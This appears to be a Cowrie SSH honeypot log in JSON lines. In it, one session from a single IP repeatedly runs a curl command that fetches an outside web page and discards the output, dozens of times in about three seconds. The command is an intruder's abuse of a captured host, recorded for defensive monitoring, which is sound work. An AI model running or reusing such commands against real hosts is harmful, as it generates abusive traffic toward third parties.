{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.593381Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.631020Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.632060Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.670259Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.671075Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.707541Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.708568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.749449Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.750321Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.788039Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.788945Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.829212Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.830365Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.867965Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.868918Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.906126Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.906930Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.945650Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.946389Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.984895Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.985595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.023275Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.024092Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.064015Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.064897Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.102239Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.103070Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.145833Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.146617Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.184773Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.185570Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.223130Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.223889Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.262585Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.263702Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.301167Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.301923Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.341093Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.341859Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.379803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.380847Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.417705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.418509Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.459524Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.460357Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.511385Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.512132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.549433Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.550280Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.587785Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.588608Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.627059Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.628333Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.670460Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.671357Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.708690Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.709863Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.751299Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.752214Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.789298Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.790139Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.827697Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.828920Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.866014Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.866959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.911001Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.911768Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.952608Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.953439Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:33.995859Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:33.996710Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.036373Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.037304Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.074911Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.075704Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.113409Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.114274Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.155059Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.156107Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.193808Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.194655Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.233039Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.233974Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.280957Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.282093Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.320884Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.321751Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.359118Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.359959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.399980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.400974Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.438738Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.439587Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.476924Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.477820Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.516620Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.517495Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.556744Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.557620Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.594765Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.595665Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.634398Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.635248Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.672033Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.672840Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.712566Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.713673Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.750742Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.751723Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.791252Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.792083Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.829072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.830118Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.867653Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.868498Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.907491Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.908442Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.947469Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.948349Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:34.985314Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:34.986134Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.022857Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.023726Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.060729Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.061553Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.097961Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.098943Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:35.136178Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:35.137517Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
